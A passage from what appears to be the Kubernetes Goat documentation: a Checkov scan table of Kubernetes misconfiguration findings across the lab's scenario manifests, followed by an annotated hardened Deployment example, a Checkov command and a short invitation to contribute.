53 | CKV_K8S_14 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Image Tag should be fixed - not latest or blank |
54 | CKV_K8S_43 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Image should use digest |
55 | CKV_K8S_31 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
56 | CKV_K8S_40 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Containers should run as a high UID to avoid host conflict |
57 | CKV_K8S_29 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Apply security context to your pods and containers |
58 | CKV_K8S_38 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
59 | CKV_K8S_21 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | The default namespace should not be used |
60 | CKV_K8S_23 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Minimize the admission of root containers |
61 | CKV_K8S_21 | /scenarios/kubernetes-goat-home/deployment.yaml | Service.kubernetes-goat-home-service.default | The default namespace should not be used |
62 | CKV_K8S_37 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
63 | CKV_K8S_8 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Liveness Probe Should be Configured |
64 | CKV_K8S_12 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Memory requests should be set |
65 | CKV_K8S_20 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
66 | CKV_K8S_10 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | CPU requests should be set |
67 | CKV_K8S_22 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Use read-only filesystem for containers where possible |
68 | CKV_K8S_9 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Readiness Probe Should be Configured |
69 | CKV_K8S_28 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
70 | CKV_K8S_30 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Apply security context to your pods and containers |
71 | CKV_K8S_14 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
72 | CKV_K8S_43 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Image should use digest |
73 | CKV_K8S_31 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
74 | CKV_K8S_40 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Containers should run as a high UID to avoid host conflict |
75 | CKV_K8S_29 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Apply security context to your pods and containers |
76 | CKV_K8S_38 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Ensure that Service Account Tokens are only mounted where necessary |
77 | CKV_K8S_21 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | The default namespace should not be used |
78 | CKV_K8S_23 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Minimize the admission of root containers |
79 | CKV_K8S_37 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Minimize the admission of containers with capabilities assigned |
80 | CKV_K8S_12 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Memory requests should be set |
81 | CKV_K8S_20 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Containers should not run with allowPrivilegeEscalation |
82 | CKV_K8S_13 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Memory limits should be set |
83 | CKV_K8S_10 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | CPU requests should be set |
84 | CKV_K8S_22 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Use read-only filesystem for containers where possible |
85 | CKV_K8S_28 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
86 | CKV_K8S_30 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Apply security context to your pods and containers |
87 | CKV_K8S_14 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Image Tag should be fixed - not latest or blank |
88 | CKV_K8S_43 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Image should use digest |
89 | CKV_K8S_11 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | CPU limits should be set |
90 | CKV_K8S_31 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
91 | CKV_K8S_40 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Containers should run as a high UID to avoid host conflict |
92 | CKV_K8S_29 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Apply security context to your pods and containers |
93 | CKV_K8S_38 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
94 | CKV_K8S_21 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | The default namespace should not be used |
95 | CKV_K8S_23 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Minimize the admission of root containers |
96 | CKV_K8S_21 | /scenarios/hunger-check/deployment.yaml | Service.hunger-check-service.default | The default namespace should not be used |
97 | CKV_K8S_37 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
98 | CKV_K8S_8 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Liveness Probe Should be Configured |
99 | CKV_K8S_12 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Memory requests should be set |
100 | CKV_K8S_20 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
101 | CKV_K8S_13 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Memory limits should be set |
102 | CKV_K8S_10 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | CPU requests should be set |
103 | CKV_K8S_22 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Use read-only filesystem for containers where possible |
104 | CKV_K8S_9 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Readiness Probe Should be Configured |
105 | CKV_K8S_28 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
106 | CKV_K8S_30 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Apply security context to your pods and containers |
107 | CKV_K8S_14 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
108 | CKV_K8S_43 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Image should use digest |
109 | CKV_K8S_11 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | CPU limits should be set |
110 | CKV_K8S_31 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
111 | CKV_K8S_40 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Containers should run as a high UID to avoid host conflict |
112 | CKV_K8S_29 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Apply security context to your pods and containers |
113 | CKV_K8S_38 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
114 | CKV_K8S_21 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | The default namespace should not be used |
115 | CKV_K8S_23 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Minimize the admission of root containers |
116 | CKV_K8S_21 | /scenarios/poor-registry/deployment.yaml | Service.poor-registry-service.default | The default namespace should not be used |
117 | CKV_K8S_37 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
118 | CKV_K8S_8 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Liveness Probe Should be Configured |
119 | CKV_K8S_12 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Memory requests should be set |
120 | CKV_K8S_20 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
121 | CKV_K8S_10 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | CPU requests should be set |
122 | CKV_K8S_22 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Use read-only filesystem for containers where possible |
123 | CKV_K8S_9 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Readiness Probe Should be Configured |
124 | CKV_K8S_28 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
125 | CKV_K8S_30 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Apply security context to your pods and containers |
126 | CKV_K8S_14 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
127 | CKV_K8S_43 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Image should use digest |
128 | CKV_K8S_31 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
129 | CKV_K8S_40 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Containers should run as a high UID to avoid host conflict |
130 | CKV_K8S_17 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Containers should not share the host process ID namespace |
131 | CKV_K8S_29 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Apply security context to your pods and containers |
132 | CKV_K8S_38 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Ensure that Service Account Tokens are only mounted where necessary |
133 | CKV_K8S_21 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | The default namespace should not be used |
134 | CKV_K8S_23 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Minimize the admission of root containers |
135 | CKV_K8S_37 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Minimize the admission of containers with capabilities assigned |
136 | CKV_K8S_12 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Memory requests should be set |
137 | CKV_K8S_20 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Containers should not run with allowPrivilegeEscalation |
138 | CKV_K8S_13 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Memory limits should be set |
139 | CKV_K8S_10 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | CPU requests should be set |
140 | CKV_K8S_22 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Use read-only filesystem for containers where possible |
141 | CKV_K8S_28 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
142 | CKV_K8S_30 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Apply security context to your pods and containers |
143 | CKV_K8S_14 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Image Tag should be fixed - not latest or blank |
144 | CKV_K8S_43 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Image should use digest |
145 | CKV_K8S_11 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | CPU limits should be set |
146 | CKV_K8S_31 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
147 | CKV_K8S_40 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Containers should run as a high UID to avoid host conflict |
148 | CKV_K8S_17 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Containers should not share the host process ID namespace |
149 | CKV_K8S_29 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Apply security context to your pods and containers |
150 | CKV_K8S_38 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Ensure that Service Account Tokens are only mounted where necessary |
151 | CKV_K8S_21 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | The default namespace should not be used |
152 | CKV_K8S_23 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Minimize the admission of root containers |
153 | CKV_K8S_37 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Minimize the admission of containers with capabilities assigned |
154 | CKV_K8S_12 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Memory requests should be set |
155 | CKV_K8S_20 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Containers should not run with allowPrivilegeEscalation |
156 | CKV_K8S_13 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Memory limits should be set |
157 | CKV_K8S_10 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | CPU requests should be set |
158 | CKV_K8S_22 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Use read-only filesystem for containers where possible |
159 | CKV_K8S_28 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
160 | CKV_K8S_30 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Apply security context to your pods and containers |
161 | CKV_K8S_14 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Image Tag should be fixed - not latest or blank |
162 | CKV_K8S_43 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Image should use digest |
163 | CKV_K8S_11 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | CPU limits should be set |
164 | CKV_K8S_31 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
165 | CKV_K8S_27 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Do not expose the docker daemon socket to containers |
166 | CKV_K8S_40 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Containers should run as a high UID to avoid host conflict |
167 | CKV_K8S_29 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Apply security context to your pods and containers |
168 | CKV_K8S_38 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
169 | CKV_K8S_21 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | The default namespace should not be used |
170 | CKV_K8S_23 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Minimize the admission of root containers |
171 | CKV_K8S_21 | /scenarios/health-check/deployment.yaml | Service.health-check-service.default | The default namespace should not be used |
172 | CKV_K8S_37 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
173 | CKV_K8S_8 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Liveness Probe Should be Configured |
174 | CKV_K8S_12 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Memory requests should be set |
175 | CKV_K8S_20 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
176 | CKV_K8S_10 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | CPU requests should be set |
177 | CKV_K8S_16 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Container should not be privileged |
178 | CKV_K8S_22 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Use read-only filesystem for containers where possible |
179 | CKV_K8S_9 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Readiness Probe Should be Configured |
180 | CKV_K8S_28 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
181 | CKV_K8S_14 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
182 | CKV_K8S_43 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Image should use digest |
183 | CKV_K8S_31 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
184 | CKV_K8S_40 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Containers should run as a high UID to avoid host conflict |
185 | CKV_K8S_29 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Apply security context to your pods and containers |
186 | CKV_K8S_38 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
187 | CKV_K8S_21 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | The default namespace should not be used |
188 | CKV_K8S_23 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Minimize the admission of root containers |
189 | CKV_K8S_21 | /scenarios/internal-proxy/deployment.yaml | Service.internal-proxy-api-service.default | The default namespace should not be used |
190 | CKV_K8S_21 | /scenarios/internal-proxy/deployment.yaml | Service.internal-proxy-info-app-service.default | The default namespace should not be used |
191 | CKV_K8S_37 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
192 | CKV_K8S_8 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Liveness Probe Should be Configured |
193 | CKV_K8S_20 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
194 | CKV_K8S_22 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Use read-only filesystem for containers where possible |
195 | CKV_K8S_9 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Readiness Probe Should be Configured |
196 | CKV_K8S_28 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
197 | CKV_K8S_30 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Apply security context to your pods and containers |
198 | CKV_K8S_14 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
199 | CKV_K8S_43 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Image should use digest |
200 | CKV_K8S_37 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Minimize the admission of containers with capabilities assigned |
201 | CKV_K8S_8 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Liveness Probe Should be Configured |
202 | CKV_K8S_20 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Containers should not run with allowPrivilegeEscalation |
203 | CKV_K8S_22 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Use read-only filesystem for containers where possible |
204 | CKV_K8S_9 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Readiness Probe Should be Configured |
205 | CKV_K8S_28 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Minimize the admission of containers with the NET_RAW capability |
206 | CKV_K8S_30 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Apply security context to your pods and containers |
207 | CKV_K8S_14 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Image Tag should be fixed - not latest or blank |
208 | CKV_K8S_43 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Image should use digest |
209 | CKV_K8S_21 | /scenarios/system-monitor/deployment.yaml | Secret.goatvault.default | The default namespace should not be used |
210 | CKV_K8S_31 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
211 | CKV_K8S_40 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should run as a high UID to avoid host conflict |
212 | CKV_K8S_19 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should not share the host network namespace |
213 | CKV_K8S_17 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should not share the host process ID namespace |
214 | CKV_K8S_18 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should not share the host IPC namespace |
215 | CKV_K8S_29 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Apply security context to your pods and containers |
216 | CKV_K8S_38 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
217 | CKV_K8S_21 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | The default namespace should not be used |
218 | CKV_K8S_23 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Minimize the admission of root containers |
219 | CKV_K8S_21 | /scenarios/system-monitor/deployment.yaml | Service.system-monitor-service.default | The default namespace should not be used |
220 | CKV_K8S_37 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
221 | CKV_K8S_8 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Liveness Probe Should be Configured |
222 | CKV_K8S_12 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Memory requests should be set |
223 | CKV_K8S_20 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
224 | CKV_K8S_10 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | CPU requests should be set |
225 | CKV_K8S_16 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Container should not be privileged |
226 | CKV_K8S_22 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Use read-only filesystem for containers where possible |
227 | CKV_K8S_9 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Readiness Probe Should be Configured |
228 | CKV_K8S_35 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Prefer using secrets as files over secrets as environment variables |
229 | CKV_K8S_28 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
230 | CKV_K8S_14 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
231 | CKV_K8S_43 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Image should use digest |
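A handful of checks recur across almost every scenario manifest: missing security contexts, mutable `:latest` images, absent probes, and unset resource requests and limits. As a reference point, a minimal sketch of a Deployment that would satisfy most of those recurring checks might look like the following. The names, ports, probe paths, and resource values are illustrative placeholders, and the image digest is deliberately left as `<digest>` — this is not one of the Kubernetes Goat manifests, which are intentionally left vulnerable:

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: example-hardened-deployment
  namespace: example-ns                     # CKV_K8S_21: avoid the default namespace
spec:
  replicas: 1
  selector:
    matchLabels:
      app: example
  template:
    metadata:
      labels:
        app: example
    spec:
      automountServiceAccountToken: false   # CKV_K8S_38: no SA token unless needed
      securityContext:
        runAsNonRoot: true                  # CKV_K8S_23: no root containers
        runAsUser: 10001                    # CKV_K8S_40: high UID avoids host conflicts
        seccompProfile:
          type: RuntimeDefault              # CKV_K8S_31: default seccomp profile
      containers:
        - name: app
          # CKV_K8S_14 / CKV_K8S_43: pin a fixed tag plus digest (placeholder digest)
          image: nginx:1.25.3@sha256:<digest>
          securityContext:                  # CKV_K8S_29 / CKV_K8S_30
            allowPrivilegeEscalation: false # CKV_K8S_20
            readOnlyRootFilesystem: true    # CKV_K8S_22
            capabilities:
              drop: ["ALL"]                 # CKV_K8S_28 / CKV_K8S_37: incl. NET_RAW
          resources:
            requests:
              cpu: 50m                      # CKV_K8S_10
              memory: 64Mi                  # CKV_K8S_12
            limits:
              cpu: 250m                     # CKV_K8S_11
              memory: 128Mi                 # CKV_K8S_13
          livenessProbe:                    # CKV_K8S_8
            httpGet: { path: /, port: 8080 }
          readinessProbe:                   # CKV_K8S_9
            httpGet: { path: /, port: 8080 }
```

Results like the table above can typically be reproduced by pointing Checkov at the manifests, e.g. `checkov -d scenarios/ --framework kubernetes`.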
Getting Involved
First of all, thank you so much for showing interest in Kubernetes Goat; we really appreciate it.
Here are some of the ways you can contribute to Kubernetes Goat:
- By providing your valuable feedback. Honest feedback is always appreciated, whether it is positive or negative :)
- By contributing to the development of the platform and scenarios
- By improving the documentation and notes
- By spreading the word and sharing it with the community, friends, and colleagues